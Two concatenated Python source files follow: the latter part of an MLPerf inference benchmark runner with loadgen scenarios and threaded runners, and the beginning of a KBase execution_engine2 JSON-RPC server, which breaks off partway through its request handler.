    "ssd-mobilenet-pytorch": {
        "inputs": "image",
        "outputs": "bboxes,labels,scores",
        "dataset": "coco-300-pt",
        "backend": "pytorch-native",
        "model-name": "ssd-mobilenet",
    },
    "ssd-mobilenet-onnxruntime": {
        "dataset": "coco-300",
        "outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
        "backend": "onnxruntime",
        "data-format": "NHWC",
        "model-name": "ssd-mobilenet",
    },

    # ssd-resnet34
    "ssd-resnet34-tf": {
        "inputs": "image:0",
        "outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
        "dataset": "coco-1200-tf",
        "backend": "tensorflow",
        "data-format": "NCHW",
        "model-name": "ssd-resnet34",
    },
    "ssd-resnet34-pytorch": {
        "inputs": "image",
        "outputs": "bboxes,labels,scores",
        "dataset": "coco-1200-pt",
        "backend": "pytorch-native",
        "model-name": "ssd-resnet34",
    },
    "ssd-resnet34-onnxruntime": {
        "dataset": "coco-1200-onnx",
        "inputs": "image",
        "outputs": "bboxes,labels,scores",
        "backend": "onnxruntime",
        "data-format": "NCHW",
        "max-batchsize": 1,
        "model-name": "ssd-resnet34",
    },
    "ssd-resnet34-onnxruntime-tf": {
        "dataset": "coco-1200-tf",
        "inputs": "image:0",
        "outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
        "backend": "onnxruntime",
        "data-format": "NHWC",
        "model-name": "ssd-resnet34",
    },
}

# Maps the --scenario option to the loadgen scenario enum.
SCENARIO_MAP = {
    "SingleStream": lg.TestScenario.SingleStream,
    "MultiStream": lg.TestScenario.MultiStream,
    "Server": lg.TestScenario.Server,
    "Offline": lg.TestScenario.Offline,
}

# Latencies (seconds) reported by loadgen's process_latencies callback.
last_timeing = []
def get_args():
    """Parse the command line.

    Defaults come from SUPPORTED_PROFILES["defaults"], overlaid with the
    selected --profile, and only fill in options the user did not pass
    explicitly. Returns the argparse namespace with `inputs`/`outputs`
    already split into lists.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
    parser.add_argument("--dataset-path", required=True, help="path to the dataset")
    parser.add_argument("--dataset-list", help="path to the dataset list")
    parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
    parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
    parser.add_argument("--scenario", default="SingleStream",
                        help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
    parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
    parser.add_argument("--model", required=True, help="model file")
    parser.add_argument("--output", help="test results")
    parser.add_argument("--inputs", help="model inputs")
    parser.add_argument("--outputs", help="model outputs")
    parser.add_argument("--backend", help="runtime to use")
    parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
    parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
    parser.add_argument("--qps", type=int, help="target qps")
    parser.add_argument("--cache", type=int, default=0, help="use cache")
    parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
    parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")

    # file to use mlperf rules compliant parameters
    parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
    # file for user LoadGen settings such as target QPS
    parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")

    # below will override mlperf rules compliant settings - don't use for official submission
    parser.add_argument("--time", type=int, help="time to scan in seconds")
    parser.add_argument("--count", type=int, help="dataset items to use")
    parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
    parser.add_argument("--samples-per-query", default=8, type=int, help="mlperf multi-stream samples per query")
    args = parser.parse_args()

    # don't use defaults in argparser. Instead we default to a dict, override that with a profile
    # and take this as default unless command line give
    # FIX: copy the defaults dict before updating -- the previous code mutated
    # SUPPORTED_PROFILES["defaults"] in place, leaking the chosen profile's
    # settings into any later get_args() call.
    defaults = dict(SUPPORTED_PROFILES["defaults"])

    if args.profile:
        profile = SUPPORTED_PROFILES[args.profile]
        defaults.update(profile)
    for k, v in defaults.items():
        kc = k.replace("-", "_")
        if getattr(args, kc) is None:
            setattr(args, kc, v)
    if args.inputs:
        args.inputs = args.inputs.split(",")
    if args.outputs:
        args.outputs = args.outputs.split(",")

    if args.scenario not in SCENARIO_MAP:
        # FIX: corrected "scanarios" typo in the user-facing error message.
        parser.error("valid scenarios:" + str(list(SCENARIO_MAP.keys())))
    return args
def get_backend(backend):
    """Instantiate the inference backend named by *backend*.

    Imports are deferred so that only the selected backend's dependencies
    need to be installed. Raises ValueError for an unrecognized name.
    """
    if backend == "tensorflow":
        from backend_tf import BackendTensorflow
        return BackendTensorflow()
    if backend == "onnxruntime":
        from backend_onnxruntime import BackendOnnxruntime
        return BackendOnnxruntime()
    if backend == "null":
        from backend_null import BackendNull
        return BackendNull()
    if backend == "pytorch":
        from backend_pytorch import BackendPytorch
        return BackendPytorch()
    if backend == "pytorch-native":
        from backend_pytorch_native import BackendPytorchNative
        return BackendPytorchNative()
    if backend == "tflite":
        from backend_tflite import BackendTflite
        return BackendTflite()
    raise ValueError("unknown backend: " + backend)
class Item:
    """One unit of work for the runner: a batch of preprocessed samples
    together with the loadgen query ids and (optional) labels."""

    def __init__(self, query_id, content_id, img, label=None):
        # Record creation time first so queueing delay is part of the latency.
        self.start = time.time()
        self.query_id = query_id      # loadgen query ids for this batch
        self.content_id = content_id  # dataset indices for this batch
        self.img = img                # preprocessed input tensor(s)
        self.label = label            # ground-truth labels, if any
class RunnerBase:
    """Synchronous query runner: enqueue() executes each batch inline on the
    calling (loadgen) thread. Used for the SingleStream scenario; threaded
    subclasses override enqueue()/handle_tasks() for the other scenarios."""

    def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
        self.take_accuracy = False
        self.ds = ds                        # dataset wrapper providing get_samples()
        self.model = model                  # backend model exposing predict()
        self.post_process = post_proc
        self.threads = threads              # only used by threaded subclasses
        self.take_accuracy = False
        self.max_batchsize = max_batchsize  # largest batch for one predict call
        self.result_timing = []             # per-item latency in seconds

    def handle_tasks(self, tasks_queue):
        # No worker threads in the base runner; subclasses override this.
        pass

    def start_run(self, result_dict, take_accuracy):
        """Reset per-run state; called once before loadgen starts a test."""
        self.result_dict = result_dict
        self.result_timing = []
        self.take_accuracy = take_accuracy
        self.post_process.start()

    def run_one_item(self, qitem):
        # run the prediction
        processed_results = []
        try:
            ##results = self.model.predict({self.model.inputs[0]: qitem.img})
            ##processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
            # NOTE(review): predict() is invoked once per query id over the
            # whole batch -- presumably a deliberate workaround in this test
            # variant (it repeats identical work); confirm before reusing.
            for i in range(len(qitem.query_id)):
                results = self.model.predict({self.model.inputs[0]: qitem.img})
                processed_results.extend(self.post_process(results, qitem.content_id, qitem.label, self.result_dict))
            if self.take_accuracy:
                self.post_process.add_results(processed_results)
            self.result_timing.append(time.time() - qitem.start)
        except Exception as ex:  # pylint: disable=broad-except
            src = [self.ds.get_item_loc(i) for i in qitem.content_id]
            log.error("thread: failed on contentid=%s, %s", src, ex)
            # since post_process will not run, fake empty responses
            processed_results = [[]] * len(qitem.query_id)
        finally:
            # Always answer loadgen, one response per query id. Keep Python
            # references to the arrays so the buffers stay alive across the
            # QuerySamplesComplete call.
            response_array_refs = []
            response = []
            for idx, query_id in enumerate(qitem.query_id):
                response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
                response_array_refs.append(response_array)
                bi = response_array.buffer_info()
                response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
            lg.QuerySamplesComplete(response)

    def enqueue(self, query_samples):
        """Run the given loadgen samples inline, split into max_batchsize chunks."""
        idx = [q.index for q in query_samples]
        query_id = [q.id for q in query_samples]
        if len(query_samples) < self.max_batchsize:
            data, label = self.ds.get_samples(idx)
            self.run_one_item(Item(query_id, idx, data, label))
        else:
            bs = self.max_batchsize
            for i in range(0, len(idx), bs):
                data, label = self.ds.get_samples(idx[i:i+bs])
                self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))

    def finish(self):
        # Nothing to tear down in the synchronous runner.
        pass
class QueueRunner(RunnerBase):
    """Threaded query runner: enqueue() only queues work; a pool of daemon
    worker threads executes the batches. Used for the MultiStream/Server/
    Offline scenarios where queries arrive concurrently."""

    def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
        super().__init__(model, ds, threads, post_proc, max_batchsize)
        # Bounded queue applies back-pressure when the workers fall behind.
        self.tasks = Queue(maxsize=threads * 4)
        self.workers = []
        self.result_dict = {}

        for _ in range(self.threads):
            worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
            worker.daemon = True
            self.workers.append(worker)
            worker.start()

    def handle_tasks(self, tasks_queue):
        """Worker thread."""
        while True:
            qitem = tasks_queue.get()
            if qitem is None:
                # None in the queue indicates the parent want us to exit
                tasks_queue.task_done()
                break
            self.run_one_item(qitem)
            tasks_queue.task_done()

    def enqueue(self, query_samples):
        """Queue the loadgen samples for the workers, in max_batchsize chunks."""
        idx = [q.index for q in query_samples]
        query_id = [q.id for q in query_samples]
        if len(query_samples) < self.max_batchsize:
            data, label = self.ds.get_samples(idx)
            self.tasks.put(Item(query_id, idx, data, label))
        else:
            bs = self.max_batchsize
            for i in range(0, len(idx), bs):
                ie = i + bs
                data, label = self.ds.get_samples(idx[i:ie])
                self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))

    def finish(self):
        # exit all threads: one None sentinel per worker, then join them.
        for _ in self.workers:
            self.tasks.put(None)
        for worker in self.workers:
            worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
    """Record summary statistics for one benchmark run.

    Computes latency percentiles over *result_list* (seconds per query),
    stores a summary dict under final_results[name], and prints a one-line
    report. Mutates result_dict["total"] when it is still zero.
    """
    pct_points = [50., 80., 90., 95., 99., 99.9]
    pct_values = np.percentile(result_list, pct_points).tolist()
    pct_text = ",".join("{}:{:.4f}".format(p, b) for p, b in zip(pct_points, pct_values))
    if result_dict["total"] == 0:
        result_dict["total"] = len(result_list)

    # this is what we record for each run
    summary = {
        "took": took,
        "mean": np.mean(result_list),
        "percentiles": {str(p): b for p, b in zip(pct_points, pct_values)},
        "qps": len(result_list) / took,
        "count": len(result_list),
        "good_items": result_dict["good"],
        "total_items": result_dict["total"],
    }

    acc_note = ""
    if show_accuracy:
        summary["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
        acc_note = ", acc={:.3f}%".format(summary["accuracy"])
        if "mAP" in result_dict:
            summary["mAP"] = 100. * result_dict["mAP"]
            acc_note += ", mAP={:.3f}%".format(summary["mAP"])

    # add the result to the result dict
    final_results[name] = summary

    # to stdout
    print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
        name, summary["qps"], summary["mean"], took, acc_note,
        len(result_list), pct_text))
def main():
    """Entry point: build the dataset and backend, configure loadgen from the
    mlperf/user config files plus command-line overrides, run the test, and
    write results.json when --output is given."""
    global last_timeing
    args = get_args()

    log.info(args)

    # find backend
    backend = get_backend(args.backend)

    # override image format if given
    image_format = args.data_format if args.data_format else backend.image_format()

    # --count applies to accuracy mode only and can be used to limit the number of images
    # for testing. For perf model we always limit count to 200.
    count_override = False
    count = args.count
    if count:
        count_override = True

    # dataset to use
    wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
    ds = wanted_dataset(data_path=args.dataset_path,
                        image_list=args.dataset_list,
                        name=args.dataset,
                        image_format=image_format,
                        pre_process=pre_proc,
                        use_cache=args.cache,
                        count=count, **kwargs)
    # load model to backend
    model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
    final_results = {
        "runtime": model.name(),
        "version": model.version(),
        "time": int(time.time()),
        "cmdline": str(args),
    }

    # Both config files are required; bail out early if either is missing.
    mlperf_conf = os.path.abspath(args.mlperf_conf)
    if not os.path.exists(mlperf_conf):
        log.error("{} not found".format(mlperf_conf))
        sys.exit(1)

    user_conf = os.path.abspath(args.user_conf)
    if not os.path.exists(user_conf):
        log.error("{} not found".format(user_conf))
        sys.exit(1)

    if args.output:
        # All further relative writes (logs, results.json) land in output_dir.
        output_dir = os.path.abspath(args.output)
        os.makedirs(output_dir, exist_ok=True)
        os.chdir(output_dir)

    #
    # make one pass over the dataset to validate accuracy
    #
    count = ds.get_item_count()

    # warmup
    ds.load_query_samples([0])
    for _ in range(5):
        img, _ = ds.get_samples([0])
        _ = backend.predict({backend.inputs[0]: img})
    ds.unload_query_samples(None)

    scenario = SCENARIO_MAP[args.scenario]
    # SingleStream runs inline; every other scenario uses the threaded runner.
    runner_map = {
        lg.TestScenario.SingleStream: RunnerBase,
        lg.TestScenario.MultiStream: QueueRunner,
        lg.TestScenario.Server: QueueRunner,
        lg.TestScenario.Offline: QueueRunner
    }
    runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)

    # Callbacks handed to loadgen.
    def issue_queries(query_samples):
        runner.enqueue(query_samples)

    def flush_queries():
        pass

    def process_latencies(latencies_ns):
        # called by loadgen to show us the recorded latencies
        global last_timeing
        last_timeing = [t / NANO_SEC for t in latencies_ns]

    settings = lg.TestSettings()
    settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
    settings.FromConfig(user_conf, args.model_name, args.scenario)
    settings.scenario = scenario
    settings.mode = lg.TestMode.PerformanceOnly
    if args.accuracy:
        settings.mode = lg.TestMode.AccuracyOnly
    if args.find_peak_performance:
        settings.mode = lg.TestMode.FindPeakPerformance

    if args.time:
        # override the time we want to run
        settings.min_duration_ms = args.time * MILLI_SEC
        settings.max_duration_ms = args.time * MILLI_SEC

    if args.qps:
        qps = float(args.qps)
        settings.server_target_qps = qps
        settings.offline_expected_qps = qps

    if count_override:
        settings.min_query_count = count
        settings.max_query_count = count

    if args.samples_per_query:
        settings.multi_stream_samples_per_query = args.samples_per_query
    if args.max_latency:
        settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
        settings.multi_stream_expected_latency_ns = int(args.max_latency * NANO_SEC)

    sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
    qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)

    log.info("starting {}".format(scenario))
    result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
    runner.start_run(result_dict, args.accuracy)

    lg.StartTest(sut, qsl, settings)

    # Fall back to the runner's own timing when loadgen reported no latencies.
    if not last_timeing:
        last_timeing = runner.result_timing
    if args.accuracy:
        post_proc.finalize(result_dict, ds, output_dir=args.output)
    add_results(final_results, "{}".format(scenario),
                result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)

    runner.finish()
    lg.DestroyQSL(qsl)
    lg.DestroySUT(sut)

    #
    # write final results
    #
    if args.output:
        with open("results.json", "w") as f:
            json.dump(final_results, f, sort_keys=True, indent=4)


if __name__ == "__main__":
    main()
|
execution_engine2Server.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from execution_engine2.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Return the path to the deployment config file, or None when unset.

    The path comes from the KB_DEPLOYMENT_CONFIG environment variable.
    """
    return environ.get(DEPLOY)
def get_service_name():
    """Return the configured service name, or None when unset.

    The name comes from the KB_SERVICE_NAME environment variable.
    """
    return environ.get(SERVICE)
def get_config():
    """Read the deployment config file and return the service section.

    Returns a plain dict of option name -> value for the section named by
    get_service_name() (falling back to 'execution_engine2'), or None when
    no config file is configured.
    """
    cfg_path = get_config_file()
    if not cfg_path:
        return None
    parser = ConfigParser()
    parser.read(cfg_path)
    section = get_service_name() or 'execution_engine2'
    return {name: value for name, value in parser.items(section)}
config = get_config()
from execution_engine2.execution_engine2Impl import execution_engine2 # noqa @IgnorePep8
impl_execution_engine2 = execution_engine2(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder extended for service responses.

    Serializes set and frozenset as JSON arrays, and delegates to an
    object's toJSONable() method when it provides one; anything else falls
    through to the stock encoder (which raises TypeError).
    """

    def default(self, obj):
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        to_jsonable = getattr(obj, 'toJSONable', None)
        if to_jsonable is not None:
            return to_jsonable()
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSON-RPC service that passes a per-request context object (ctx) as the
    first argument of every dispatched method and serializes results with
    JSONObjectEncoder.

    NOTE(review): relies on jsonrpcbase internals (_man_args, _max_args,
    _vargs, _fill_request, _get_default_vals, _fill_ver,
    _validate_params_types) -- confirm against the installed jsonrpcbase
    version when upgrading.
    """

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # The '- 1' offsets account for the injected ctx argument,
                # which does not appear in the wire-level params list.
                # Does it have enough arguments?
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            # JSON-RPC level errors propagate unchanged to the caller.
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method: wrap it as a server
            # error carrying the traceback and repr of the original args.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError

        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch: parse every entry first, then dispatch them in
            # order, collecting only the non-notification responses.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # Optional declared-type validation for methods registered with
        # a 'types' specification.
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-call context: a dict of request metadata (client IP, user, module,
    method, call id, provenance, ...) plus convenience wrappers around the
    service logger."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels accepted verbatim by log_debug(); plain ints 1-3 are mapped
        # onto levels 7-9 instead (see log_debug below).
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        """Log *message* at error level."""
        self._log(log.ERR, message)

    def log_info(self, message):
        """Log *message* at info level."""
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        """Log a debug message.

        *level* may be one of the pre-approved debug levels (7-9 or the
        'DEBUG*' strings) or an int 1-3 which is shifted into the 7-9 range.
        Raises ValueError for anything else.
        """
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            # Map user-facing 1-3 onto the logger's 7-9 debug levels.
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Every log line carries the request identification fields.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Return provenance for this call.

        If SDK_CALLBACK_URL is set, queries the callback server for it
        (raising ServerError on failure); otherwise returns the locally
        stored 'provenance' entry.
        """
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # A 500 with a JSON body is a structured JSON-RPC error;
                # anything else is reported verbatim.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = '' if not message else message
        # 'data' is the JSON-RPC 2.0 field name, 'error' the 1.1 equivalent;
        # whichever is supplied wins, defaulting to the empty string.
        self.data = data or error or ''

    def __str__(self):
        return '{}: {}. {}\n{}'.format(
            self.name, self.code, self.message, self.data)
def getIPAddress(environ):
    """Best-effort client IP from a WSGI environ.

    Honours X-Forwarded-For (first hop) and then X-Real-IP unless the
    service config sets dont_trust_x_ip_headers to 'true'; falls back to
    REMOTE_ADDR.
    """
    forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
    real_ip = environ.get('HTTP_X_REAL_IP')
    trust_x_headers = (config is None or
                       config.get('dont_trust_x_ip_headers') != 'true')

    if trust_x_headers:
        if forwarded_for:
            # X-Forwarded-For is a comma-separated chain; the originating
            # client is the first entry.
            return forwarded_for.split(',')[0].strip()
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over
    """WSGI application: registers every execution_engine2 method with the
    JSON-RPC service, records its auth requirement, and dispatches incoming
    POSTed JSON-RPC requests with per-request logging and auth checks."""

    def logcallback(self):
        # Keep the server log pointed at the same file as the user log when
        # the latter is reconfigured.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'execution_engine2'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # Maps rpc method name -> 'none' | 'optional' | 'required'.
        self.method_authentication = dict()
        self.rpc_service.add(impl_execution_engine2.list_config,
                             name='execution_engine2.list_config',
                             types=[])
        self.method_authentication['execution_engine2.list_config'] = 'optional'  # noqa
        self.rpc_service.add(impl_execution_engine2.ver,
                             name='execution_engine2.ver',
                             types=[])
        self.method_authentication['execution_engine2.ver'] = 'none'  # noqa
        self.rpc_service.add(impl_execution_engine2.status,
                             name='execution_engine2.status',
                             types=[])
        self.method_authentication['execution_engine2.status'] = 'none'  # noqa
        self.rpc_service.add(impl_execution_engine2.run_job,
                             name='execution_engine2.run_job',
                             types=[dict])
        self.method_authentication['execution_engine2.run_job'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.get_job_params,
                             name='execution_engine2.get_job_params',
                             types=[str])
        self.method_authentication['execution_engine2.get_job_params'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.update_job_status,
                             name='execution_engine2.update_job_status',
                             types=[dict])
        self.method_authentication['execution_engine2.update_job_status'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.add_job_logs,
                             name='execution_engine2.add_job_logs',
                             types=[str, list])
        self.method_authentication['execution_engine2.add_job_logs'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.get_job_logs,
                             name='execution_engine2.get_job_logs',
                             types=[dict])
        self.method_authentication['execution_engine2.get_job_logs'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.finish_job,
                             name='execution_engine2.finish_job',
                             types=[dict])
        self.method_authentication['execution_engine2.finish_job'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.start_job,
                             name='execution_engine2.start_job',
                             types=[dict])
        self.method_authentication['execution_engine2.start_job'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_job,
                             name='execution_engine2.check_job',
                             types=[dict])
        self.method_authentication['execution_engine2.check_job'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_jobs,
                             name='execution_engine2.check_jobs',
                             types=[dict])
        self.method_authentication['execution_engine2.check_jobs'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_workspace_jobs,
                             name='execution_engine2.check_workspace_jobs',
                             types=[dict])
        self.method_authentication['execution_engine2.check_workspace_jobs'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.cancel_job,
                             name='execution_engine2.cancel_job',
                             types=[dict])
        self.method_authentication['execution_engine2.cancel_job'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_job_canceled,
                             name='execution_engine2.check_job_canceled',
                             types=[dict])
        self.method_authentication['execution_engine2.check_job_canceled'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.get_job_status,
                             name='execution_engine2.get_job_status',
                             types=[str])
        self.method_authentication['execution_engine2.get_job_status'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_jobs_date_range_for_user,
                             name='execution_engine2.check_jobs_date_range_for_user',
                             types=[dict])
        self.method_authentication['execution_engine2.check_jobs_date_range_for_user'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.check_jobs_date_range_for_all,
                             name='execution_engine2.check_jobs_date_range_for_all',
                             types=[dict])
        self.method_authentication['execution_engine2.check_jobs_date_range_for_all'] = 'required'  # noqa
        self.rpc_service.add(impl_execution_engine2.is_admin,
                             name='execution_engine2.is_admin',
                             types=[dict])
        self.method_authentication['execution_engine2.is_admin'] = 'required'  # noqa
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        # Default to 500 unless the request completes successfully.
        status = '500 Internal Server Error'
        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                # Request body was not valid JSON: standard parse error.
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
